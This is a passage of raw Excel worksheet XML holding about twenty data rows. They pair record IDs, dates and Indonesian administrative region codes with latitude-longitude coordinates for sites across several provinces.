        <v>2627</v>
      </c>
      <c r="L3999" t="s">
        <v>13445</v>
      </c>
      <c r="M3999">
        <v>3273090001</v>
      </c>
      <c r="N3999">
        <v>3273090</v>
      </c>
      <c r="O3999">
        <v>3273</v>
      </c>
      <c r="P3999">
        <v>32</v>
      </c>
      <c r="Q3999" t="s">
        <v>6791</v>
      </c>
      <c r="R3999" t="s">
        <v>1468</v>
      </c>
      <c r="S3999" t="s">
        <v>1464</v>
      </c>
      <c r="T3999" t="s">
        <v>42</v>
      </c>
      <c r="U3999" s="5">
        <v>10764638186</v>
      </c>
      <c r="V3999" s="5" t="s">
        <v>18064</v>
      </c>
      <c r="W3999" s="5">
        <v>-695496895</v>
      </c>
      <c r="X3999" t="s">
        <v>21796</v>
      </c>
      <c r="Y3999" t="str">
        <f t="shared" si="62"/>
        <v>-6.95496895,107.64638186</v>
      </c>
    </row>
    <row r="4000" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4000">
        <v>299021</v>
      </c>
      <c r="B4000" s="1">
        <v>44519</v>
      </c>
      <c r="C4000" t="s">
        <v>13446</v>
      </c>
      <c r="D4000" t="s">
        <v>22</v>
      </c>
      <c r="E4000" t="s">
        <v>23</v>
      </c>
      <c r="F4000" t="s">
        <v>13447</v>
      </c>
      <c r="G4000" t="s">
        <v>13448</v>
      </c>
      <c r="H4000" t="s">
        <v>7086</v>
      </c>
      <c r="I4000" t="s">
        <v>7087</v>
      </c>
      <c r="J4000" t="s">
        <v>2627</v>
      </c>
      <c r="L4000" t="s">
        <v>13449</v>
      </c>
      <c r="M4000">
        <v>3204290005</v>
      </c>
      <c r="N4000">
        <v>3204290</v>
      </c>
      <c r="O4000">
        <v>3204</v>
      </c>
      <c r="P4000">
        <v>32</v>
      </c>
      <c r="Q4000" t="s">
        <v>9417</v>
      </c>
      <c r="R4000" t="s">
        <v>2170</v>
      </c>
      <c r="S4000" t="s">
        <v>1464</v>
      </c>
      <c r="T4000" t="s">
        <v>42</v>
      </c>
      <c r="U4000" s="5">
        <v>10774815559</v>
      </c>
      <c r="V4000" s="5" t="s">
        <v>18065</v>
      </c>
      <c r="W4000" s="5">
        <v>-696162023</v>
      </c>
      <c r="X4000" t="s">
        <v>21797</v>
      </c>
      <c r="Y4000" t="str">
        <f t="shared" si="62"/>
        <v>-6.96162023,107.74815559</v>
      </c>
    </row>
    <row r="4001" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4001">
        <v>299056</v>
      </c>
      <c r="B4001" s="1">
        <v>44524</v>
      </c>
      <c r="C4001" t="s">
        <v>13450</v>
      </c>
      <c r="D4001" t="s">
        <v>22</v>
      </c>
      <c r="E4001" t="s">
        <v>23</v>
      </c>
      <c r="F4001" t="s">
        <v>13451</v>
      </c>
      <c r="H4001" t="s">
        <v>26</v>
      </c>
      <c r="I4001" t="s">
        <v>7487</v>
      </c>
      <c r="J4001" t="s">
        <v>2608</v>
      </c>
      <c r="L4001" t="s">
        <v>13452</v>
      </c>
      <c r="M4001">
        <v>3302100007</v>
      </c>
      <c r="N4001">
        <v>3302100</v>
      </c>
      <c r="O4001">
        <v>3302</v>
      </c>
      <c r="P4001">
        <v>33</v>
      </c>
      <c r="Q4001" t="s">
        <v>13453</v>
      </c>
      <c r="R4001" t="s">
        <v>13453</v>
      </c>
      <c r="S4001" t="s">
        <v>13454</v>
      </c>
      <c r="T4001" t="s">
        <v>1134</v>
      </c>
      <c r="U4001" s="5">
        <v>10929443836</v>
      </c>
      <c r="V4001" s="5" t="s">
        <v>18066</v>
      </c>
      <c r="W4001" s="5">
        <v>-748750552</v>
      </c>
      <c r="X4001" t="s">
        <v>21798</v>
      </c>
      <c r="Y4001" t="str">
        <f t="shared" si="62"/>
        <v>-7.48750552,109.29443836</v>
      </c>
    </row>
    <row r="4002" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4002">
        <v>298924</v>
      </c>
      <c r="B4002" s="1">
        <v>44502</v>
      </c>
      <c r="C4002" t="s">
        <v>13455</v>
      </c>
      <c r="D4002" t="s">
        <v>22</v>
      </c>
      <c r="E4002" t="s">
        <v>23</v>
      </c>
      <c r="F4002" t="s">
        <v>13456</v>
      </c>
      <c r="H4002" t="s">
        <v>26</v>
      </c>
      <c r="I4002" t="s">
        <v>1009</v>
      </c>
      <c r="J4002" t="s">
        <v>2608</v>
      </c>
      <c r="L4002" t="s">
        <v>13457</v>
      </c>
      <c r="M4002">
        <v>3302730005</v>
      </c>
      <c r="N4002">
        <v>3302730</v>
      </c>
      <c r="O4002">
        <v>3302</v>
      </c>
      <c r="P4002">
        <v>33</v>
      </c>
      <c r="Q4002" t="s">
        <v>13458</v>
      </c>
      <c r="R4002" t="s">
        <v>13459</v>
      </c>
      <c r="S4002" t="s">
        <v>13454</v>
      </c>
      <c r="T4002" t="s">
        <v>1134</v>
      </c>
      <c r="U4002" s="5">
        <v>10926224917</v>
      </c>
      <c r="V4002" s="5" t="s">
        <v>18067</v>
      </c>
      <c r="W4002" s="5">
        <v>-742517150</v>
      </c>
      <c r="X4002" t="s">
        <v>21799</v>
      </c>
      <c r="Y4002" t="str">
        <f t="shared" si="62"/>
        <v>-7.42517150,109.26224917</v>
      </c>
    </row>
    <row r="4003" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4003">
        <v>298932</v>
      </c>
      <c r="B4003" s="1">
        <v>44504</v>
      </c>
      <c r="C4003" t="s">
        <v>13460</v>
      </c>
      <c r="D4003" t="s">
        <v>22</v>
      </c>
      <c r="E4003" t="s">
        <v>23</v>
      </c>
      <c r="F4003" t="s">
        <v>13461</v>
      </c>
      <c r="G4003" t="s">
        <v>13462</v>
      </c>
      <c r="H4003" t="s">
        <v>26</v>
      </c>
      <c r="I4003" t="s">
        <v>4228</v>
      </c>
      <c r="J4003" t="s">
        <v>2622</v>
      </c>
      <c r="L4003" t="s">
        <v>13463</v>
      </c>
      <c r="M4003">
        <v>3579030006</v>
      </c>
      <c r="N4003">
        <v>3579030</v>
      </c>
      <c r="O4003">
        <v>3579</v>
      </c>
      <c r="P4003">
        <v>35</v>
      </c>
      <c r="Q4003" t="s">
        <v>13464</v>
      </c>
      <c r="R4003" t="s">
        <v>13465</v>
      </c>
      <c r="S4003" t="s">
        <v>9473</v>
      </c>
      <c r="T4003" t="s">
        <v>1221</v>
      </c>
      <c r="U4003" s="5">
        <v>11252394676</v>
      </c>
      <c r="V4003" s="5" t="s">
        <v>18068</v>
      </c>
      <c r="W4003" s="5">
        <v>-778260152</v>
      </c>
      <c r="X4003" t="s">
        <v>21800</v>
      </c>
      <c r="Y4003" t="str">
        <f t="shared" si="62"/>
        <v>-7.78260152,112.52394676</v>
      </c>
    </row>
    <row r="4004" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4004">
        <v>298929</v>
      </c>
      <c r="B4004" s="1">
        <v>44504</v>
      </c>
      <c r="C4004" t="s">
        <v>13466</v>
      </c>
      <c r="D4004" t="s">
        <v>22</v>
      </c>
      <c r="E4004" t="s">
        <v>23</v>
      </c>
      <c r="F4004" t="s">
        <v>13467</v>
      </c>
      <c r="G4004" t="s">
        <v>13468</v>
      </c>
      <c r="H4004" t="s">
        <v>26</v>
      </c>
      <c r="I4004" t="s">
        <v>10107</v>
      </c>
      <c r="J4004" t="s">
        <v>2622</v>
      </c>
      <c r="L4004" t="s">
        <v>13469</v>
      </c>
      <c r="M4004">
        <v>3579030003</v>
      </c>
      <c r="N4004">
        <v>3579030</v>
      </c>
      <c r="O4004">
        <v>3579</v>
      </c>
      <c r="P4004">
        <v>35</v>
      </c>
      <c r="Q4004" t="s">
        <v>13470</v>
      </c>
      <c r="R4004" t="s">
        <v>13465</v>
      </c>
      <c r="S4004" t="s">
        <v>9473</v>
      </c>
      <c r="T4004" t="s">
        <v>1221</v>
      </c>
      <c r="U4004" s="5">
        <v>11253294513</v>
      </c>
      <c r="V4004" s="5" t="s">
        <v>18069</v>
      </c>
      <c r="W4004" s="5">
        <v>-784725557</v>
      </c>
      <c r="X4004" t="s">
        <v>21801</v>
      </c>
      <c r="Y4004" t="str">
        <f t="shared" si="62"/>
        <v>-7.84725557,112.53294513</v>
      </c>
    </row>
    <row r="4005" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4005">
        <v>298911</v>
      </c>
      <c r="B4005" s="1">
        <v>44501</v>
      </c>
      <c r="C4005" t="s">
        <v>13471</v>
      </c>
      <c r="D4005" t="s">
        <v>85</v>
      </c>
      <c r="E4005" t="s">
        <v>23</v>
      </c>
      <c r="F4005" t="s">
        <v>13472</v>
      </c>
      <c r="G4005" t="s">
        <v>13473</v>
      </c>
      <c r="H4005" t="s">
        <v>26</v>
      </c>
      <c r="J4005" t="s">
        <v>2627</v>
      </c>
      <c r="K4005" t="s">
        <v>13474</v>
      </c>
      <c r="L4005" t="s">
        <v>13475</v>
      </c>
      <c r="M4005">
        <v>3275012003</v>
      </c>
      <c r="N4005">
        <v>3275012</v>
      </c>
      <c r="O4005">
        <v>3275</v>
      </c>
      <c r="P4005">
        <v>32</v>
      </c>
      <c r="Q4005" t="s">
        <v>11684</v>
      </c>
      <c r="R4005" t="s">
        <v>4089</v>
      </c>
      <c r="S4005" t="s">
        <v>41</v>
      </c>
      <c r="T4005" t="s">
        <v>42</v>
      </c>
      <c r="U4005" s="5">
        <v>10692838940</v>
      </c>
      <c r="V4005" s="5" t="s">
        <v>18070</v>
      </c>
      <c r="W4005" s="5">
        <v>-630973620</v>
      </c>
      <c r="X4005" t="s">
        <v>21802</v>
      </c>
      <c r="Y4005" t="str">
        <f t="shared" si="62"/>
        <v>-6.30973620,106.92838940</v>
      </c>
    </row>
    <row r="4006" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4006">
        <v>298913</v>
      </c>
      <c r="B4006" s="1">
        <v>44501</v>
      </c>
      <c r="C4006" t="s">
        <v>13476</v>
      </c>
      <c r="D4006" t="s">
        <v>85</v>
      </c>
      <c r="E4006" t="s">
        <v>23</v>
      </c>
      <c r="F4006" t="s">
        <v>13477</v>
      </c>
      <c r="G4006" t="s">
        <v>13478</v>
      </c>
      <c r="H4006" t="s">
        <v>26</v>
      </c>
      <c r="J4006" t="s">
        <v>2627</v>
      </c>
      <c r="K4006" t="s">
        <v>13479</v>
      </c>
      <c r="L4006" t="s">
        <v>13480</v>
      </c>
      <c r="M4006">
        <v>3275020005</v>
      </c>
      <c r="N4006">
        <v>3275020</v>
      </c>
      <c r="O4006">
        <v>3275</v>
      </c>
      <c r="P4006">
        <v>32</v>
      </c>
      <c r="Q4006" t="s">
        <v>827</v>
      </c>
      <c r="R4006" t="s">
        <v>828</v>
      </c>
      <c r="S4006" t="s">
        <v>41</v>
      </c>
      <c r="T4006" t="s">
        <v>42</v>
      </c>
      <c r="U4006" s="5">
        <v>10695185000</v>
      </c>
      <c r="V4006" s="5" t="s">
        <v>18071</v>
      </c>
      <c r="W4006" s="5">
        <v>-628701270</v>
      </c>
      <c r="X4006" t="s">
        <v>21803</v>
      </c>
      <c r="Y4006" t="str">
        <f t="shared" si="62"/>
        <v>-6.28701270,106.95185000</v>
      </c>
    </row>
    <row r="4007" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4007">
        <v>298907</v>
      </c>
      <c r="B4007" s="1">
        <v>44501</v>
      </c>
      <c r="C4007" t="s">
        <v>13481</v>
      </c>
      <c r="D4007" t="s">
        <v>85</v>
      </c>
      <c r="E4007" t="s">
        <v>23</v>
      </c>
      <c r="F4007" t="s">
        <v>13482</v>
      </c>
      <c r="G4007" t="s">
        <v>13483</v>
      </c>
      <c r="H4007" t="s">
        <v>26</v>
      </c>
      <c r="J4007" t="s">
        <v>2627</v>
      </c>
      <c r="K4007" t="s">
        <v>13484</v>
      </c>
      <c r="L4007" t="s">
        <v>13485</v>
      </c>
      <c r="M4007">
        <v>3275060002</v>
      </c>
      <c r="N4007">
        <v>3275060</v>
      </c>
      <c r="O4007">
        <v>3275</v>
      </c>
      <c r="P4007">
        <v>32</v>
      </c>
      <c r="Q4007" t="s">
        <v>113</v>
      </c>
      <c r="R4007" t="s">
        <v>114</v>
      </c>
      <c r="S4007" t="s">
        <v>41</v>
      </c>
      <c r="T4007" t="s">
        <v>42</v>
      </c>
      <c r="U4007" s="5">
        <v>10695911150</v>
      </c>
      <c r="V4007" s="5" t="s">
        <v>18072</v>
      </c>
      <c r="W4007" s="5">
        <v>-623108560</v>
      </c>
      <c r="X4007" t="s">
        <v>21804</v>
      </c>
      <c r="Y4007" t="str">
        <f t="shared" si="62"/>
        <v>-6.23108560,106.95911150</v>
      </c>
    </row>
    <row r="4008" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4008">
        <v>299016</v>
      </c>
      <c r="B4008" s="1">
        <v>44517</v>
      </c>
      <c r="C4008" t="s">
        <v>13486</v>
      </c>
      <c r="D4008" t="s">
        <v>22</v>
      </c>
      <c r="E4008" t="s">
        <v>23</v>
      </c>
      <c r="F4008" t="s">
        <v>13487</v>
      </c>
      <c r="G4008" t="s">
        <v>13488</v>
      </c>
      <c r="H4008" t="s">
        <v>26</v>
      </c>
      <c r="I4008" t="s">
        <v>7285</v>
      </c>
      <c r="J4008" t="s">
        <v>7399</v>
      </c>
      <c r="L4008" t="s">
        <v>13489</v>
      </c>
      <c r="M4008">
        <v>1408010022</v>
      </c>
      <c r="N4008">
        <v>1408010</v>
      </c>
      <c r="O4008">
        <v>1408</v>
      </c>
      <c r="P4008">
        <v>14</v>
      </c>
      <c r="Q4008" t="s">
        <v>13490</v>
      </c>
      <c r="R4008" t="s">
        <v>13491</v>
      </c>
      <c r="S4008" t="s">
        <v>13492</v>
      </c>
      <c r="T4008" t="s">
        <v>7404</v>
      </c>
      <c r="U4008" s="5">
        <v>10115532875</v>
      </c>
      <c r="V4008" s="5" t="s">
        <v>18073</v>
      </c>
      <c r="W4008" s="5">
        <v>140783566</v>
      </c>
      <c r="X4008" t="s">
        <v>21805</v>
      </c>
      <c r="Y4008" t="str">
        <f t="shared" si="62"/>
        <v>1.40783566,101.15532875</v>
      </c>
    </row>
    <row r="4009" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4009">
        <v>298956</v>
      </c>
      <c r="B4009" s="1">
        <v>44507</v>
      </c>
      <c r="C4009" t="s">
        <v>13493</v>
      </c>
      <c r="D4009" t="s">
        <v>22</v>
      </c>
      <c r="E4009" t="s">
        <v>23</v>
      </c>
      <c r="F4009" t="s">
        <v>13494</v>
      </c>
      <c r="G4009" t="s">
        <v>13495</v>
      </c>
      <c r="H4009" t="s">
        <v>26</v>
      </c>
      <c r="I4009" t="s">
        <v>774</v>
      </c>
      <c r="J4009" t="s">
        <v>2627</v>
      </c>
      <c r="L4009" t="s">
        <v>13496</v>
      </c>
      <c r="M4009">
        <v>3271030003</v>
      </c>
      <c r="N4009">
        <v>3271030</v>
      </c>
      <c r="O4009">
        <v>3271</v>
      </c>
      <c r="P4009">
        <v>32</v>
      </c>
      <c r="Q4009" t="s">
        <v>13497</v>
      </c>
      <c r="R4009" t="s">
        <v>12410</v>
      </c>
      <c r="S4009" t="s">
        <v>421</v>
      </c>
      <c r="T4009" t="s">
        <v>42</v>
      </c>
      <c r="U4009" s="5">
        <v>10682277203</v>
      </c>
      <c r="V4009" s="5" t="s">
        <v>18074</v>
      </c>
      <c r="W4009" s="5">
        <v>-655036640</v>
      </c>
      <c r="X4009" t="s">
        <v>21806</v>
      </c>
      <c r="Y4009" t="str">
        <f t="shared" si="62"/>
        <v>-6.55036640,106.82277203</v>
      </c>
    </row>
    <row r="4010" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4010">
        <v>298951</v>
      </c>
      <c r="B4010" s="1">
        <v>44507</v>
      </c>
      <c r="C4010" t="s">
        <v>13498</v>
      </c>
      <c r="D4010" t="s">
        <v>22</v>
      </c>
      <c r="E4010" t="s">
        <v>23</v>
      </c>
      <c r="F4010" t="s">
        <v>13499</v>
      </c>
      <c r="G4010" t="s">
        <v>13500</v>
      </c>
      <c r="H4010" t="s">
        <v>26</v>
      </c>
      <c r="I4010" t="s">
        <v>788</v>
      </c>
      <c r="J4010" t="s">
        <v>2627</v>
      </c>
      <c r="L4010" t="s">
        <v>13501</v>
      </c>
      <c r="M4010">
        <v>3201220013</v>
      </c>
      <c r="N4010">
        <v>3201220</v>
      </c>
      <c r="O4010">
        <v>3201</v>
      </c>
      <c r="P4010">
        <v>32</v>
      </c>
      <c r="Q4010" t="s">
        <v>13502</v>
      </c>
      <c r="R4010" t="s">
        <v>2147</v>
      </c>
      <c r="S4010" t="s">
        <v>421</v>
      </c>
      <c r="T4010" t="s">
        <v>42</v>
      </c>
      <c r="U4010" s="5">
        <v>10681210756</v>
      </c>
      <c r="V4010" s="5" t="s">
        <v>18075</v>
      </c>
      <c r="W4010" s="5">
        <v>-646356424</v>
      </c>
      <c r="X4010" t="s">
        <v>21807</v>
      </c>
      <c r="Y4010" t="str">
        <f t="shared" si="62"/>
        <v>-6.46356424,106.81210756</v>
      </c>
    </row>
    <row r="4011" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4011">
        <v>298954</v>
      </c>
      <c r="B4011" s="1">
        <v>44507</v>
      </c>
      <c r="C4011" t="s">
        <v>13503</v>
      </c>
      <c r="D4011" t="s">
        <v>22</v>
      </c>
      <c r="E4011" t="s">
        <v>23</v>
      </c>
      <c r="F4011" t="s">
        <v>13504</v>
      </c>
      <c r="G4011" t="s">
        <v>13505</v>
      </c>
      <c r="H4011" t="s">
        <v>26</v>
      </c>
      <c r="I4011" t="s">
        <v>945</v>
      </c>
      <c r="J4011" t="s">
        <v>2627</v>
      </c>
      <c r="L4011" t="s">
        <v>13506</v>
      </c>
      <c r="M4011">
        <v>3271030003</v>
      </c>
      <c r="N4011">
        <v>3271030</v>
      </c>
      <c r="O4011">
        <v>3271</v>
      </c>
      <c r="P4011">
        <v>32</v>
      </c>
      <c r="Q4011" t="s">
        <v>13497</v>
      </c>
      <c r="R4011" t="s">
        <v>12410</v>
      </c>
      <c r="S4011" t="s">
        <v>421</v>
      </c>
      <c r="T4011" t="s">
        <v>42</v>
      </c>
      <c r="U4011" s="5">
        <v>10682372321</v>
      </c>
      <c r="V4011" s="5" t="s">
        <v>18076</v>
      </c>
      <c r="W4011" s="5">
        <v>-655077309</v>
      </c>
      <c r="X4011" t="s">
        <v>21808</v>
      </c>
      <c r="Y4011" t="str">
        <f t="shared" si="62"/>
        <v>-6.55077309,106.82372321</v>
      </c>
    </row>
    <row r="4012" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4012">
        <v>298917</v>
      </c>
      <c r="B4012" s="1">
        <v>44502</v>
      </c>
      <c r="C4012" t="s">
        <v>13507</v>
      </c>
      <c r="D4012" t="s">
        <v>22</v>
      </c>
      <c r="E4012" t="s">
        <v>23</v>
      </c>
      <c r="F4012" t="s">
        <v>13508</v>
      </c>
      <c r="G4012" t="s">
        <v>13509</v>
      </c>
      <c r="H4012" t="s">
        <v>26</v>
      </c>
      <c r="I4012" t="s">
        <v>137</v>
      </c>
      <c r="J4012" t="s">
        <v>2627</v>
      </c>
      <c r="L4012" t="s">
        <v>13510</v>
      </c>
      <c r="M4012">
        <v>3201190010</v>
      </c>
      <c r="N4012">
        <v>3201190</v>
      </c>
      <c r="O4012">
        <v>3201</v>
      </c>
      <c r="P4012">
        <v>32</v>
      </c>
      <c r="Q4012" t="s">
        <v>419</v>
      </c>
      <c r="R4012" t="s">
        <v>420</v>
      </c>
      <c r="S4012" t="s">
        <v>421</v>
      </c>
      <c r="T4012" t="s">
        <v>42</v>
      </c>
      <c r="U4012" s="5">
        <v>10697126678</v>
      </c>
      <c r="V4012" s="5" t="s">
        <v>18077</v>
      </c>
      <c r="W4012" s="5">
        <v>-632754800</v>
      </c>
      <c r="X4012" t="s">
        <v>21809</v>
      </c>
      <c r="Y4012" t="str">
        <f t="shared" si="62"/>
        <v>-6.32754800,106.97126678</v>
      </c>
    </row>
    <row r="4013" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4013">
        <v>298958</v>
      </c>
      <c r="B4013" s="1">
        <v>44507</v>
      </c>
      <c r="C4013" t="s">
        <v>13511</v>
      </c>
      <c r="D4013" t="s">
        <v>22</v>
      </c>
      <c r="E4013" t="s">
        <v>23</v>
      </c>
      <c r="F4013" t="s">
        <v>13512</v>
      </c>
      <c r="G4013" t="s">
        <v>13513</v>
      </c>
      <c r="H4013" t="s">
        <v>26</v>
      </c>
      <c r="I4013" t="s">
        <v>882</v>
      </c>
      <c r="J4013" t="s">
        <v>2627</v>
      </c>
      <c r="L4013" t="s">
        <v>13514</v>
      </c>
      <c r="M4013">
        <v>3201130006</v>
      </c>
      <c r="N4013">
        <v>3201130</v>
      </c>
      <c r="O4013">
        <v>3201</v>
      </c>
      <c r="P4013">
        <v>32</v>
      </c>
      <c r="Q4013" t="s">
        <v>13515</v>
      </c>
      <c r="R4013" t="s">
        <v>2636</v>
      </c>
      <c r="S4013" t="s">
        <v>421</v>
      </c>
      <c r="T4013" t="s">
        <v>42</v>
      </c>
      <c r="U4013" s="5">
        <v>10683958518</v>
      </c>
      <c r="V4013" s="5" t="s">
        <v>18078</v>
      </c>
      <c r="W4013" s="5">
        <v>-658984637</v>
      </c>
      <c r="X4013" t="s">
        <v>21810</v>
      </c>
      <c r="Y4013" t="str">
        <f t="shared" si="62"/>
        <v>-6.58984637,106.83958518</v>
      </c>
    </row>
    <row r="4014" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4014">
        <v>298903</v>
      </c>
      <c r="B4014" s="1">
        <v>44501</v>
      </c>
      <c r="C4014" t="s">
        <v>13516</v>
      </c>
      <c r="D4014" t="s">
        <v>22</v>
      </c>
      <c r="E4014" t="s">
        <v>23</v>
      </c>
      <c r="F4014" t="s">
        <v>13517</v>
      </c>
      <c r="G4014" t="s">
        <v>13518</v>
      </c>
      <c r="H4014" t="s">
        <v>26</v>
      </c>
      <c r="I4014" t="s">
        <v>290</v>
      </c>
      <c r="J4014" t="s">
        <v>8176</v>
      </c>
      <c r="L4014" t="s">
        <v>13519</v>
      </c>
      <c r="M4014">
        <v>7107010008</v>
      </c>
      <c r="N4014">
        <v>7107010</v>
      </c>
      <c r="O4014">
        <v>7107</v>
      </c>
      <c r="P4014">
        <v>71</v>
      </c>
      <c r="Q4014" t="s">
        <v>13520</v>
      </c>
      <c r="R4014" t="s">
        <v>13392</v>
      </c>
      <c r="S4014" t="s">
        <v>13352</v>
      </c>
      <c r="T4014" t="s">
        <v>8181</v>
      </c>
      <c r="U4014" s="5">
        <v>12364957809</v>
      </c>
      <c r="V4014" s="5" t="s">
        <v>18079</v>
      </c>
      <c r="W4014" s="5">
        <v>84754714</v>
      </c>
      <c r="X4014" t="s">
        <v>21811</v>
      </c>
      <c r="Y4014" t="str">
        <f t="shared" si="62"/>
        <v xml:space="preserve"> 0.84754714,123.64957809</v>
      </c>
    </row>
    <row r="4015" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4015">
        <v>299014</v>
      </c>
      <c r="B4015" s="1">
        <v>44515</v>
      </c>
      <c r="C4015" t="s">
        <v>13521</v>
      </c>
      <c r="D4015" t="s">
        <v>22</v>
      </c>
      <c r="E4015" t="s">
        <v>23</v>
      </c>
      <c r="F4015" t="s">
        <v>13522</v>
      </c>
      <c r="G4015" t="s">
        <v>13523</v>
      </c>
      <c r="H4015" t="s">
        <v>26</v>
      </c>
      <c r="I4015" t="s">
        <v>1624</v>
      </c>
      <c r="J4015" t="s">
        <v>8176</v>
      </c>
      <c r="L4015" t="s">
        <v>13524</v>
      </c>
      <c r="M4015">
        <v>7107030013</v>
      </c>
      <c r="N4015">
        <v>7107030</v>
      </c>
      <c r="O4015">
        <v>7107</v>
      </c>
      <c r="P4015">
        <v>71</v>
      </c>
      <c r="Q4015" t="s">
        <v>13525</v>
      </c>
      <c r="R4015" t="s">
        <v>13526</v>
      </c>
      <c r="S4015" t="s">
        <v>13352</v>
      </c>
      <c r="T4015" t="s">
        <v>8181</v>
      </c>
      <c r="U4015" s="5">
        <v>12349770069</v>
      </c>
      <c r="V4015" s="5" t="s">
        <v>18080</v>
      </c>
      <c r="W4015" s="5">
        <v>88148931</v>
      </c>
      <c r="X4015" t="s">
        <v>21812</v>
      </c>
      <c r="Y4015" t="str">
        <f t="shared" si="62"/>
        <v xml:space="preserve"> 0.88148931,123.49770069</v>
      </c>
    </row>
    <row r="4016" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4016">
        <v>299013</v>
      </c>
      <c r="B4016" s="1">
        <v>44515</v>
      </c>
      <c r="C4016" t="s">
        <v>13527</v>
      </c>
      <c r="D4016" t="s">
        <v>22</v>
      </c>
      <c r="E4016" t="s">
        <v>23</v>
      </c>
      <c r="F4016" t="s">
        <v>13528</v>
      </c>
      <c r="G4016" t="s">
        <v>13529</v>
      </c>
      <c r="H4016" t="s">
        <v>26</v>
      </c>
      <c r="I4016" t="s">
        <v>1194</v>
      </c>
      <c r="J4016" t="s">
        <v>8176</v>
      </c>
      <c r="L4016" t="s">
        <v>13530</v>
      </c>
      <c r="M4016">
        <v>7107030013</v>
      </c>
      <c r="N4016">
        <v>7107030</v>
      </c>
      <c r="O4016">
        <v>7107</v>
      </c>
      <c r="P4016">
        <v>71</v>
      </c>
      <c r="Q4016" t="s">
        <v>13525</v>
      </c>
      <c r="R4016" t="s">
        <v>13526</v>
      </c>
      <c r="S4016" t="s">
        <v>13352</v>
      </c>
      <c r="T4016" t="s">
        <v>8181</v>
      </c>
      <c r="U4016" s="5">
        <v>12349885941</v>
      </c>
      <c r="V4016" s="5" t="s">
        <v>18081</v>
      </c>
      <c r="W4016" s="5">
        <v>88178968</v>
      </c>
      <c r="X4016" t="s">
        <v>21813</v>
      </c>
      <c r="Y4016" t="str">
        <f t="shared" si="62"/>
        <v xml:space="preserve"> 0.88178968,123.49885941</v>
      </c>
    </row>
    <row r="4017" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4017">
        <v>298935</v>
      </c>
      <c r="B4017" s="1">
        <v>44505</v>
      </c>
      <c r="C4017" t="s">
        <v>13531</v>
      </c>
      <c r="D4017" t="s">
        <v>22</v>
      </c>
      <c r="E4017" t="s">
        <v>23</v>
      </c>
      <c r="F4017" t="s">
        <v>13532</v>
      </c>
      <c r="G4017" t="s">
        <v>13533</v>
      </c>
      <c r="H4017" t="s">
        <v>7978</v>
      </c>
      <c r="I4017" t="s">
        <v>7983</v>
      </c>
      <c r="J4017" t="s">
        <v>8176</v>
      </c>
      <c r="L4017" t="s">
        <v>13534</v>
      </c>
      <c r="M4017">
        <v>7107010010</v>
      </c>
      <c r="N4017">
        <v>7107010</v>
      </c>
      <c r="O4017">
        <v>7107</v>
      </c>
      <c r="P4017">
        <v>71</v>
      </c>
      <c r="Q4017" t="s">
        <v>13535</v>
      </c>
      <c r="R4017" t="s">
        <v>13392</v>
      </c>
      <c r="S4017" t="s">
        <v>13352</v>
      </c>
      <c r="T4017" t="s">
        <v>8181</v>
      </c>
      <c r="U4017" s="5">
        <v>12359012604</v>
      </c>
      <c r="V4017" s="5" t="s">
        <v>18082</v>
      </c>
      <c r="W4017" s="5">
        <v>90214339</v>
      </c>
      <c r="X4017" t="s">
        <v>21814</v>
      </c>
      <c r="Y4017" t="str">
        <f t="shared" si="62"/>
        <v xml:space="preserve"> 0.90214339,123.59012604</v>
      </c>
    </row>
    <row r="4018" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4018">
        <v>298904</v>
      </c>
      <c r="B4018" s="1">
        <v>44501</v>
      </c>
      <c r="C4018" t="s">
        <v>13536</v>
      </c>
      <c r="D4018" t="s">
        <v>22</v>
      </c>
      <c r="E4018" t="s">
        <v>23</v>
      </c>
      <c r="F4018" t="s">
        <v>13537</v>
      </c>
      <c r="G4018" t="s">
        <v>13538</v>
      </c>
      <c r="H4018" t="s">
        <v>7086</v>
      </c>
      <c r="I4018" t="s">
        <v>9356</v>
      </c>
      <c r="J4018" t="s">
        <v>8176</v>
      </c>
      <c r="L4018" t="s">
        <v>13539</v>
      </c>
      <c r="M4018">
        <v>7107050004</v>
      </c>
      <c r="N4018">
        <v>7107050</v>
      </c>
      <c r="O4018">
        <v>7107</v>
      </c>
      <c r="P4018">
        <v>71</v>
      </c>
      <c r="Q4018" t="s">
        <v>13357</v>
      </c>
      <c r="R4018" t="s">
        <v>13358</v>
      </c>
      <c r="S4018" t="s">
        <v>13352</v>
      </c>
      <c r="T4018" t="s">
        <v>8181</v>
      </c>
      <c r="U4018" s="5">
        <v>12325875878</v>
      </c>
      <c r="V4018" s="5" t="s">
        <v>18083</v>
      </c>
      <c r="W4018" s="5">
        <v>90668828</v>
      </c>
      <c r="X4018" t="s">
        <v>21815</v>
      </c>
      <c r="Y4018" t="str">
        <f t="shared" si="62"/>
        <v xml:space="preserve"> 0.90668828,123.25875878</v>
      </c>
    </row>
    <row r="4019" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4019">
        <v>298983</v>
      </c>
      <c r="B4019" s="1">
        <v>44508</v>
      </c>
      <c r="C4019" t="s">
        <v>13540</v>
      </c>
      <c r="D4019" t="s">
        <v>22</v>
      </c>
      <c r="E4019" t="s">
        <v>23</v>
      </c>
      <c r="F4019" t="s">
        <v>13541</v>
      </c>
      <c r="G4019" t="s">
        <v>13542</v>
      </c>
      <c r="H4019" t="s">
        <v>26</v>
      </c>
      <c r="I4019" t="s">
        <v>1538</v>
      </c>
      <c r="J4019" t="s">
        <v>7171</v>
      </c>
      <c r="L4019" t="s">
        <v>13543</v>
      </c>
      <c r="M4019">
        <v>6474020004</v>
      </c>
      <c r="N4019">
        <v>6474020</v>
      </c>
      <c r="O4019">
        <v>6474</v>
      </c>
